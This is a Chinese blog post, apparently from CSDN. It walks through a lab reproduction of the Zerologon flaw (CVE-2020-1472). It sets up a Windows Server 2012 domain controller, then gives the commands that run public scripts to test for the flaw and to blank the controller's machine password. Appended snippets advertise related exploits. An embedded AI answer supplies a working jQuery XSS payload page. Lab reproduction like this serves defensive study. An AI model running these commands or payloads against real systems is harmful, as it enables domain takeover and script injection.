CVE-2020-1472复现打域控(包含Win Server 2012域环境搭建)

原创 已于 2022-10-21 10:35:09 修改 · 1.4k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试 #网络安全 #python

于 2022-10-21 10:17:06 首次发布

CVE-2020-1472复现打域控(包含Win Server 2012域环境搭建)

目的

Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空。

复现环境

DC:os:windows 2012 server ip:192.168.59.141
攻击机:os:kali ip:192.168.59.128

影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Server 2012 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation) Windows Server 2016 Windows Server 2016 (Server Core installation) Windows Server 2019 Windows Server 2019 (Server Core installation) Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation) Windows Server, version 2004 (Server Core installation)

Win Server 2012域环境搭建

搭建windows server 2012域环境
安装虚拟机Windows server2012R2标准版

在这里插入图片描述

分配足够大的内存(至少8G)
在这里插入图片描述

等待安装成功
在这里插入图片描述

启动管理员账户Administrator,设置新的密码
在这里插入图片描述

注销当前账户,登录到Adminnistrator账户
在这里插入图片描述

设置静态IP地址192.168.92.145
在这里插入图片描述

添加DNS服务器
在这里插入图片描述

安装成功后进入DNS管理
在这里插入图片描述

创建一个正向解析记录
在这里插入图片描述

创建成功
在这里插入图片描述

添加角色或功能,添加AD域服务
在这里插入图片描述

安装成功将此服务器提升为域控制器
在这里插入图片描述

建立新林
在这里插入图片描述

设置密码
在这里插入图片描述

提供凭证,输入管理员账号密码
在这里插入图片描述

设置NETBIOS域名
在这里插入图片描述
下一步至先决条件检查,不意外的话点击安装并重启
在这里插入图片描述

重启之后添加角色或功能,安装IIS服务,
在这里插入图片描述
搭建完毕后,可以使用Netdom query fsmo命令查看域环境信息
在这里插入图片描述

nbtstat -n 获取当前机器的NetBIOS名称
在这里插入图片描述
查看域控主机ip地址
在这里插入图片描述至此域环境搭建完毕

CVE-2020-1472 复现

下载poc:https://github.com/SecuraBV/CVE-2020-1472
验证漏洞是否存在:

python3 /home/kali/Desktop/zerologon_tester.py  WIN-PEB4H6RPOC2  192.168.59.141

如下图所示,漏洞存在
在这里插入图片描述

下载exp: git clone https://github.com/dirkjanm/CVE-2020-1472
置空DC的密码

python3 /home/kali/Desktop/cve-2020-1472-exploit.py WIN-PEB4H6RPOC2 192.168.59.141

在这里插入图片描述

至此我们就成功地将域控中保存在AD中的管理员password设置为空,方便下一步的渗透。

Netlogon特权提升漏洞 (CVE-2020-1472)
渗透之路,攻防之间皆学问
03-18 5277
2020年8月份微软发布的安全公告中,有一个十分紧急的漏洞——CVE-2020-1472 NetLogon 权限提升漏洞。通过该漏洞,未经身份验证的攻击者只需要能访问的135端口即可通过 NetLogon 远程协议连接并重置机器的Hash,从而导致攻击者可以利用的机器账户导出内所有用户的Hash(的机器账户默认具有DCSync权限)。该漏洞存在的原因是Netlogon协议中加密模块存在问题,导致攻击者能够在没有有效凭据的情况下通过身份认证。
CVE-2020-1472 内提权复现
文公子的博客
12-07 634
CVE-2020-1472 内提权复现 *漏洞介绍* 在今年9月份,国外披露了CVE-2020-1472(又被叫做ZeroLogon)的漏洞详情,网上也随即公开了Exp。是近几年windows上比较重量级别的一个漏洞。通过该漏洞,攻击者只需能够访问的445端口,在无需任何凭据的情况下能拿到管的权限。该漏洞的产生来源于Netlogon协议认证的加密模块存在缺陷,导致攻击者可以在没有凭证的情况情况下通过认证。该漏洞的最稳定利用是调用netlogon中RPC函数NetrServerPasswordSet2
【漏洞复现篇】CVE-2020-1472-微软NetLogon权限提升-手把手教学-简单域环境搭建与Exp执行
安道实验室
09-19 439
CVE-2020-1472复现
sinat_36853972的博客
09-21 1306
CVE-2020-1472复现 简介 Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置密码的远程接口也使用了该函数,导致可以将中保存在AD中的管理员password设置为空 复现环境 DC: os:windows 2012 server ip:192.168.106.137 攻击机: os:kali ip:192.168.106.129 影响版本 Windows Server 2008 R2 for x64-based Systems Service P
(环境搭建+复现CVE-2020-1472 NetLogon 内提权漏洞
daxi0ng的博客
01-25 4260
0x00 简介 Netlogon组件是Windows上一项重要的功能组件,用于用户和机器在内网络上的认证,以及复制数据库以进行备份,还用于维护成员与之间、之间、DC与跨DC之间的关系。 Netlogon远程协议是一个可用的在Windows制器上的RPC(remote procedure call protocol,远程过程调用协议,允许像调用本地服务一样调用远程服务)接口,用于对中的用户和其他服务进行身份验证,最常见的是方便用户使用NTLM(N...
Kerberos Bronze Bit Attack(CVE-2020-17049) 绕过复现
whojoe的博客
07-21 558
前言 前面说到可以通过设置 高权限用户没有在特殊要求之下设置为不可委派 为了防止凭据被盗微软推出了Protected Users组,适用于Windows Server 2016,Windows Server 2012 R2、 Windows Server 2012 这个就是绕过这个策略的方法 环境搭建 主机 机器名 ip 用户 密码 版本 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 内机器 user.tes
内网渗透:六、CVE-2021-42287/CVE-2021-42278 内提权
liu_jia_liang的博客
02-22 2117
0x01简介 2021 年 11 月 9 日,国外研究员在推特上发布了 Active Directory 相关的 CVECVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致内普通用户权限提升至管权限。0x02 影响0x02范围 CVE-2021-42287: Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Server 2...
微软通杀漏洞-CVE-2021-1675复现
Gamma_lab的博客
08-06 523
环境 受害机:window2019(192.168.153.133) 攻击机:kali(192.168.153.134) 利用前提 或许需要:SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限 一定需要:一个普通的用户 一定需要:开启Spooler服务 环境搭建 安装impacket git clone https://github.com/cube0x0/impacket cd impacket python3 ./setup.py insta
CVE-2022-26923权限提升漏洞复现
ordar123的博客
05-27 1275
本文首发于蛇矛实验室:https://mp.weixin.qq.com/s/AuPajld1K7N5alAkgMZNfA 环境搭建 选择一台winserver2016搭建服务,这里是winserver2016。选择Active Directory 服务,其他默认即可。 安装完成之后,提升为制器,开始配置。 添加新林rangenet.cn,其他默认,然后一步步到安装完成。 ADCS搭建 下面正式开始安装ADCS服务,只需要注意下面截图的内容,其他都是默认。 服务器管理器–>添
内大杀器CVE-2020-1472复现
茶寂的博客
12-25 5897
前一段时间打ctf第一次接触渗透,其中CVE-2020-1472被称为的大杀器,在本地搭建了个环境复现一下 CVE-2020-1472影响的版本: Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Ser
CVE-2019-0803.rar
01-05
windows 7 实测本地提权通过 2008实测部分通过 之后的因为环境原因未有实测 使用方式未 exe + cmd+命令 !进步更大!!!!!
CVE-2017-12615-master.zip
09-04
CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;
CVE-2020-0796 POC EXP.zip
04-01
CVE-2020-0796的poc检测代码。 CVE-2020-0796本地exp执行代码。
CVE-2017-11882
12-09
CVE-2017-11882,用于创建钓鱼word,可以添加命令,用来反弹shell,可以用powershell
CVE-2021-26855
03-12
CVE-2021-26855-PoC CVE-2021-26855的PoC漏洞利用代码。 原始代码由开发。 添加其他功能(用户枚举等)后不久,原始存储库被删除。 如果您有最新版本,请发布拉取请求。 CVE-2021-26855 SSRF轻松使用Golang练习 受影响的版本: Exchange Server 2013小于CU23 Exchange Server 2016小于CU18 Exchange Server 2019小于CU7 使用条件: 此漏洞与以前的交换漏洞不同。 此漏洞不需要可以登录的用户身份。它可以在未经授权的情况下获取内部用户资源。 它可以与CVE-2021-27065一起使用以实现远程命令执行。 漏洞触发要求: Vulnerability in the target server The target exchange server must be a
看我拿下-cve2020-1472-Netlogon
weixin_43227251的博客
04-13 782
cve2020-1472 文章目录cve2020-1472简介影响版本环境简介DCAttack漏洞验证漏洞利用利用复现环境配置安装Impacket下载EXP置空密码获取HASH获取SHELL获取原HASH解HASH恢复HASH检查是否恢复 简介 2020年8月11号,微软修复了Netlogon 特权提升漏洞,当攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与制器连接的易受攻击的 Netlogon 安全通道时,存在特权提升漏洞。成功利用此漏洞的攻击者可以在网络中的设备上运行经特殊设计的应
记一次从linux打进
hackzkaq的博客
03-20 1271
这个周的话比较忙,就简单复盘一次之前从linux打进所涉及的内容,整体来说比较容易理解,从信息收集到权限维持都有所涉及。
如何攻击
02-03 700
在Active Directory中获得管理员权限的攻击方法 https://adsecurity.org/?p=2362 Kerberos票证:理解和利用 https://www.tarlogic.com/en/blog/kerberos-tickets-comprehension-and-exploitation/ Kerberos(I):Kerberos如何工作?–理论 http...
CVE-2020-1472 内提权
Adminxe的博客
12-29 2586
0x00 测试环境 DC(WIN-ENS2VR5TR3N):192.168.183.130 攻击机器:192.168.183.129 0x01 对进行测试漏洞是否存在 python3 zerologon_tester.py WIN-ENS2VR5TR3N 192.168.183.130 0x02 使用zerologon工具将密码打成空 (这里打空的用户是所在机器的账户,并不是账户。) python3 set_empty_pw DC_NETBIOS_NAME DC_I..
CVE-2020-11023 漏洞的复现步骤和环境搭建方法是什么?
最新发布
07-22
<think>我们正在讨论CVE-2020-11023漏洞的复现。根据之前的上下文,CVE-2020-11022和CVE-2020-11023是两个相关的jQuery漏洞。CVE-2020-11023是另一个XSS漏洞,同样在jQuery 3.5.0之前版本中存在。 根据引用[1],这两个漏洞都是跨站脚本漏洞(XSS),影响jQuery 1.2及以上版本,直到3.5.0版本才被修复。 CVE-2020-11023漏洞的具体情况:当用户传递来自不受信任来源的HTML时,执行类似`$("<div>")`的操作,如果该HTML包含`<option>`元素,则可能执行恶意脚本。这是因为在旧版本中,jQuery在构建`<option>`元素时使用了`<select>`的包装,而这种方式可能导致脚本执行。 复现步骤: ### 环境准备 - 操作系统:任意(Linux、macOS、Windows均可) - Web服务器:Python的`http.server`模块或任何其他简易服务器 - 浏览器:推荐Chrome或Firefox(用于观察XSS效果) - jQuery版本:使用3.5.0之前的版本,例如3.4.1 ### 复现步骤 1. **下载jQuery 3.4.1** 从jQuery官网下载jQuery 3.4.1版本(或其他受影响版本),保存为`jquery-3.4.1.js`。 2. **创建测试页面** 创建一个HTML文件,例如`cve-2020-11023.html`,内容如下: ```html <!DOCTYPE html> <html> <head> <title>CVE-2020-11023 漏洞复现</title> <script src="jquery-3.4.1.js"></script> </head> <body> <div id="test"></div> <script> // 模拟用户输入的恶意HTML字符串 // 注意:实际攻击中,这个字符串可能来自用户输入(如表单、URL参数等) var maliciousHTML = "<option><style></option><img src=x onerror=alert(1)>"; // 使用jQuery创建DOM元素 // 在jQuery 3.4.1中,这种方式会触发XSS $(maliciousHTML).appendTo("#test"); </script> </body> </html> ``` 3. **启动Web服务器** 在包含上述HTML文件和jQuery文件的目录中,运行Python的简易HTTP服务器: ```bash python3 -m http.server 8000 ``` 4. **访问测试页面** 打开浏览器,访问`http://localhost:8000/cve-2020-11023.html`。如果漏洞复现成功,浏览器会弹出一个警告框(显示`1`)。 ### 漏洞原理 在jQuery 3.5.0之前的版本中,当使用`$()`创建元素时,如果传入的字符串中包含`<option>`标签,jQuery会尝试将其包装在`<select>`标签中以修复某些浏览器的兼容性问题。然而,这种包装处理会导致后续的解析出现异常,使得原本不应该执行的脚本(如`onerror`事件中的代码)得以执行。 ### 安全修复建议 升级到jQuery 3.5.0或更高版本。在3.5.0版本中,jQuery团队修改了HTML解析逻辑,避免了对`<option>`等标签的特殊处理,从而修复了此漏洞。 ### 总结 CVE-2020-11023漏洞是由于jQuery在解析包含特定标签(如`<option>`)的HTML字符串时,采用了不安全的包装方式,导致恶意脚本执行。通过上述步骤可以复现该漏洞。 ### 相关问题 1. CVE-2020-11022和CVE-2020-11023有什么区别? 2. 除了升级jQuery,还有哪些方法可以防止这类XSS漏洞? 3. 如何检测网站中是否使用了受CVE-2020-11023影响的jQuery版本? 4. jQuery 3.5.0版本中还有哪些安全改进?</think>### CVE-2020-11023 漏洞复现步骤与环境搭建 CVE-2020-11023 是 jQuery 的另一个 XSS 漏洞,与 CVE-2020-11022 同时修复于 jQuery 3.5.0 版本。该漏洞允许攻击者通过特制的 HTML 字符串执行恶意代码,主要出现在使用 `$()` 创建 DOM 元素时[^1]。以下是详细复现步骤: #### 环境准备 1. **操作系统**:Linux/macOS/Windows(推荐使用 Linux) 2. **Web 服务器**:Python 简易 HTTP 服务器 3. **浏览器**:Chrome/Firefox(最新版) 4. **jQuery 版本**:使用受影响版本(如 3.4.1) #### 复现步骤 1. **下载 jQuery 3.4.1** ```bash wget https://code.jquery.com/jquery-3.4.1.js ``` 2. **创建测试页面** 新建 `cve-2020-11023.html` 文件: ```html <!DOCTYPE html> <html> <head> <title>CVE-2020-11023 复现</title> <script src="jquery-3.4.1.js"></script> </head> <body> <div id="target"></div> <script> // 恶意 HTML 字符串(包含特制的 <option> 标签) const maliciousHTML = ` <option><style></option></select> <img src=x onerror=alert(document.domain)> `; // 漏洞触发点:使用 $() 创建 DOM 元素 $(maliciousHTML).appendTo("#target"); </script> </body> </html> ``` 3. **启动 Web 服务器** ```bash python3 -m http.server 8000 ``` 4. **访问测试页面** 打开浏览器访问:`http://localhost:8000/cve-2020-11023.html` 5. **验证漏洞** - 成功复现时,浏览器会弹出警告框显示 `localhost`(或其他名) - 开发者工具可见异常解析的 DOM 结构: ```html <select> <option><style></option> </select> <img src="x" onerror="alert(document.domain)"> ``` #### 漏洞原理 当使用 `$()` 处理包含特定标签序列(如 `<option><style></option>`)的 HTML 字符串时: 1. jQuery 错误地创建了 `<select>` 包装器 2. 导致后续 `<img>` 标签的 `onerror` 事件被解析执行 3. 攻击者可构造任意 JavaScript 代码执行[^1] #### 修复方案 升级到 jQuery ≥ 3.5.0,该版本: 1. 移除了 HTML 解析中的包装逻辑 2. 引入更严格的输入过滤 3. 修复了 CVE-2020-11022 和 CVE-2020-11023 两个 XSS 漏洞 ```bash # 升级命令示例 wget https://code.jquery.com/jquery-3.5.0.js ``` ### 补充说明 - **漏洞区别**:CVE-2020-11022 通过 CSS 选择器注入,CVE-2020-11023 通过 HTML 字符串注入 - **影响范围**:jQuery 1.0.4 至 3.4.1(3.5.0 修复) - **真实案例**:攻击者可结合用户输入(如评论框)注入恶意 HTML ### 检测方法 ```javascript // 检查 jQuery 版本是否受影响 if ($.fn.jquery && $.fn.jquery < "3.5.0") { console.warn("Vulnerable to CVE-2020-11023"); } ``` ### 相关问题 1. CVE-2020-11022 和 CVE-2020-11023 的漏洞原理有何本质区别? 2. 如何在不升级 jQuery 的情况下临时防御这类 XSS 漏洞? 3. jQuery 3.5.0 的 HTML 解析机制具体做了哪些安全改进? 4. 除了 jQuery,还有哪些前端库存在类似的 HTML 解析漏洞? 5. 如何自动化检测网站中的易受攻击 jQuery 版本?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值